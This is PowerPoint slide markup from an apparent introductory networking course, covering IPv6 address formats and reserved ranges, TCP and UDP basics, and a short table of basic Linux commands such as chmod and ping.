                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C212BB5-8FB4-95EF-F252-96694C057BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4439285" y="2787650"/>
            <a:ext cx="3113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 the file  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{227C1765-C44F-0E7D-7396-967ABAA388D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3184323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 err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> 777 file name   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r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4E4A5C0F-4BF1-7926-7754-997CB7D5E243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379302" y="3208067"/>
            <a:ext cx="270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Change file permissions  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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10EF63-8521-2EC3-9419-E696A6EF66D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022920" y="3365336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E703C7-4341-2684-03B9-9BB885549754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2873888" y="3797935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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B6DB2D8-702B-C131-1464-B13D85247062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453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ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> address   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F3DFE7-C391-4F93-F756-8F3E246245CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4245781" y="3573896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Test connected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>   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662842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3111A05-C1E3-15B4-B0DE-7C2EE600CEF8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098C32C-14A2-96ED-B766-3399D7FD52F1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6 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IPv6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421DE1B-A3D7-3F5E-1393-1CDE5EC5208C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78D77A4-8C9D-419E-7FAF-0900B3CFA2B3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60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C9B7830-42E1-B12F-AD0A-32D8D7ACFFD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1373748"/>
            <a:ext cx="7299959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65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>32-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bit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address,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IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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has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2^32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=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4.294.967.296</a:t>
            </a:r>
            <a:endParaRPr sz="2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possible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addresses.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While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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>128-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bit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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IPv6</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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address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has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2^128</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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2^32</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2^96</a:t>
            </a:r>
            <a:endParaRPr sz="2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possible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addresses.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2^96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equal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79</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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octillion</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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addresses</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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723B73-E7C8-6881-13C2-3ECD5C71AB11}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2552760" y="1238400"/>
              <a:ext cx="5253480" cy="317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723B73-E7C8-6881-13C2-3ECD5C71AB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3400" y="1229040"/>
                <a:ext cx="5272200" cy="31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5604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612B6DB-FD8F-0ADB-55AC-E6C3748AEACF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98DADB4-3405-76DB-03B8-FB8087691492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lang="en-US" dirty="0"/>
              <a:t>6 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> IPv6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7FD7D19-3044-4044-26DE-40604A77F9AE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 Section 1, Module 2 - Caendra Inc. © 2019 |</a:t>
            </a:r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CA96BB8-EA2C-82F3-26FC-FB8810363C23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dirty="0"/>
              <a:t>p.</a:t>
            </a:r>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr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61</a:t>
            </a:fld>
            <a:endParaRPr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F346CE2-DEB1-8AF8-295F-1C4E6AA65D39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1813041"/>
            <a:ext cx="782700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An IPv6 address consists of 16-bit hexadecimal numbers separated by a colon (:). Hexadecimal numbers are case insensitive. In case zeros occur, they can be skipped.</a:t>
            </a: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dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Let’s check out some IPv6 examples on the next slide.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2463D8-02EA-6DF6-3C03-C696E1B7B894}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="971640" y="119160"/>
              <a:ext cx="4348440" cy="233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2463D8-02EA-6DF6-3C03-C696E1B7B8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280" y="109800"/>
                <a:ext cx="4367160" cy="23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402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EE5AB275-AFCA-88D3-CFBB-0F97D41AD1F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498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DCB039B-3540-810C-D5E0-4DEDB794D463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="114046"/>
            <a:ext cx="7936052" cy="737458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="288366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27455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lang="en-US" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>IPv6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6F4CB5F-CC41-8DA9-F4D0-5D72F7845D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474185" y="1984804"/>
            <a:ext cx="621030" cy="2310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4610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>EXAMPLE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A660CD7-BE02-B2C1-7E64-4A401FA97979}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1653920" y="1957274"/>
            <a:ext cx="6574790" cy="214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IPv6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addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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examples: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 dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="324485" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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2001:0db8:0020:130F:0000:0000:087C:140B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Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="323215"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2001:0db8:0:160F::850C:140B</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr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3E0A79BC-FBE6-3E9E-FA22-7FFF3DCE67A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1633727" y="1013524"/>
            <a:ext cx="7014972" cy="106616"/>
            <a:chOff x="1633727" y="1013523"/>
            <a:chExt cx="7014972" cy="106616"/>
          </a:xfrm>
        </p:grpSpPr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88F1DD67-37FC-182E-714E-43F3E90A4DE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3727" y="1013523"/>
              <a:ext cx="7014972" cy="106616"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1C903F8-E513-C023-CDBA-9AAE6552E964}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1677161" y="1049274"/>
              <a:ext cx="6920865" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6920865">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6920738" y="0"/>
                  </a:lnTo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95D8204B-0A76-B682-2059-B98AB026E51D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4836078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00A4B4F-9A66-001B-545A-E2F29A6DD053}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4846724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62</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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12B203-D221-0A58-74DE-A7652FEB7622}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1886040" y="2671920"/>
              <a:ext cx="6367680" cy="2367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12B203-D221-0A58-74DE-A7652FEB76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6680" y="2662560"/>
                <a:ext cx="6386400" cy="238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1238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569E4B9-5D5E-2A22-708C-0581BDDE9C29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DDD934D-C3CC-25E9-5BF0-7C0299410946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6 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IPv6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forms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2649330-9B04-D6C7-5D77-4BF83615AC3A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12E430E-FA2C-FAC4-5F2C-E21B56DCE83A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63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874DED1-02AE-DE57-D9E1-1E0A4A1D861A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1099805"/>
            <a:ext cx="7640320" cy="331787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IPv6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presented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following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text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representations:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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Regular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form: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1080:0:FF:0:8:800:200C:417A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  <a:buClr>
                <a:srgbClr val="252525"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPts val="2735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Compressed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form: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FF01:0:0:0:0:0:0:43</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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becomes</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPts val="2735"/>
              </a:lnSpc>
            </a:pP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FF01::43</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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result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skipping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zeros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 dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPts val="2735"/>
              </a:lnSpc>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="2755900" algn="l"/>
                <a:tab pos="6139815" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>IPv4-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compatible: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	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0:0:0:0:0:0:13.1.68.3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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	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::13.1.68.3</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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after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skipping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zeros</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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57EF0E-A0B1-EF47-F342-787D464AA837}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1533600" y="1657440"/>
              <a:ext cx="5343840" cy="253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57EF0E-A0B1-EF47-F342-787D464AA8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240" y="1648080"/>
                <a:ext cx="5362560" cy="255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8903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D274157-BD2A-CB4C-C68A-29927E6B7072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449720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681DB57-C86A-06A3-8548-77BF056698B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537146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6 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IPv6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Addresses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5DB7AA9-76CC-0C28-F3B8-3A64F1946550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528307" y="4836074"/>
            <a:ext cx="1776095" cy="1600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252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>https://tools.ietf.org/html/rfc3513</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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C3F5609-BE5D-200B-FC1B-5C17283D7E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236223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854073D-3DC5-F815-9D90-17DE0B2ADBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236223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64</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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BA3CCC1-D228-B75F-94A3-F0AFDF418A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536537" y="1193916"/>
            <a:ext cx="765365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IPv6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also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has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reserved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addresses,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which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cannot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used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like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reserved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IPv4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ones.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example:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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::1/128</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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b="1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b="1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loopback</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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address</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>::FFFF:0:0/96</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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are IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="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mapped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 addresses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more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information,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check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Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>RFC3513</a:t>
            </a:r>
            <a:endParaRPr sz="24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292971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C76BCCB-097A-B196-A30C-686EED915582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6054471" y="185828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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="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82B6152-883D-1F21-1EE7-A073C6D26FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2840356" y="4766051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4FAE99C8-5D81-1DFB-B1CA-5B6CF99CC1A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2840356" y="4776697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65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C256515-5FA0-91C3-5310-3B361A9B4B6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2406905" y="2008532"/>
            <a:ext cx="34734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95" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" spc="-25" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:endParaRPr sz="5400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418313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038F458-53E0-35EC-B91B-52BFA82B15A8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EB28BB3-0193-BE30-BF03-61233F4A16B0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7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TCP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UDP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915D2BF-76B5-9227-8953-C2291EC512FF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F6F2BD0-F208-FC7A-53B9-421C21ECD0CF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66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6670584-CA3A-6E95-78B2-BBC7928E672C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1446594"/>
            <a:ext cx="7886065" cy="273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524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this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section,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transport</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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r>
              <a:rPr sz="2400" b="1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works,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application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services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identify server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client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processes.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Transmission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Control</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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b="1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(TCP)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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>User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Datagram</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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b="1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(UDP)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most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common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transport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protocols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Internet.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091045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BC35E36-10FF-3C98-CABA-289914A4EE33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27E0C31-5CE6-1747-383C-EA8C48765287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7 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TCP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UDP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795588C-3C10-7DBE-48EE-548CF1C157D1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1B6ABFC-58D5-87D0-1EF4-E09FACADE705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67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27C6FC4-0E54-26DB-BD7C-BE867BE5C6B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1186372"/>
            <a:ext cx="7842884" cy="3465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Before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checking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out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different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services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transport layer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offer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application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layer,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let’s consider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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something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important</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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about</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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networks.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>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="110489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Computer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unreliable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This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means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that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some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packets</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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b="1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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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lost</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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during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their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trip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source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to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destination.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lost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because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network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congestion,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temporary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loss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connection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other technical</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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issues.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638761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D056BA-A9E9-6741-411F-541C3514C682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AB7CDE1-3142-D452-6749-1CB5BF801D50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7 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TCP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UDP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B166C1F-AABE-4CE5-6D60-18353D6AD2A7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69AB309-7146-1087-2715-10250D50B273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68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4D4612B-7148-9C94-E642-DF9CA99790AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1235064"/>
            <a:ext cx="8024495" cy="331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465455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When</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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designing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transport</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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protocol,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designer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must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choose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deal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with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these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limitations.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example,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TCP:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRP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Guarantees</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1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200" b="1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delivery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Because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that,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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2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application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needs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guaranteed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delivery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TCP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transport protocol.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="381000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also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connection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1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252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>oriented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must</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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establish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connection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before</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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transferring</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-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data.</a:t>
            </a:r>
            <a:endParaRPr sz="2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2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Keep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mind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these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facts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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during</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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your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study!</a:t>
            </a:r>
            <a:endParaRPr sz="22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006146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809661C-E85E-EF5A-3028-896F5DCFD6D2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DD62C8E-CC66-F192-F7B0-D5F1360F8EFA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7 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TCP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UDP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9F331D6-83B7-7D4C-E383-74C46EAF4C9A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DD1142E3-AE5A-78A1-90CD-7A19687CA5D9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69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6483CDD-5B37-AC36-22E0-0D1DC586D6C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1629475"/>
            <a:ext cx="7967980" cy="236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TCP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most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transport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Internet.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vast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majority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applications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it,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IP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protocol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suite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often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called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TCP/IP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>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="672465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Email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clients,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web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browsers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FTP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clients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some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common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applications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using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TCP.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7754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D234-4BCD-BC97-A8E3-CFCA5C37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F4558-A185-A939-B1CD-FB564E71D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B3D2724-E004-3947-4908-8873D96A025C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1BDC0EF-B85B-97FC-5878-6C12CACF9EB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60ED6EA-ECCE-2CF8-68DD-CA69C04EB58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7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A38D4D8-C06A-D4A6-0173-64C19C2353F6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AE841FA2-16FC-DB08-F59D-E38FCEF65E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8AD48C0F-0A36-5D4F-CFAE-7C13C5BC34A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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205EF7C1-B3C4-54EC-18D3-3E54A6FB1B1C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90A1718C-590D-F202-0505-F2DCDC88282C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376EE2A3-D8E4-616D-83B5-690FF05BC53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A3F7E8C8-E671-E70E-DB69-AE8B34A75861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33ADBE33-D6BB-FDEE-728E-3390153B0ADA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D169290E-4632-F8D3-E6E4-729971A7E390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7</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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A7E2C3AE-AF34-7BB2-D06B-4E57F625B649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1.2 All Kali Linux commands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C36B1D5A-B8C9-D57F-65CE-14AECC4BA4FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485140" y="1706880"/>
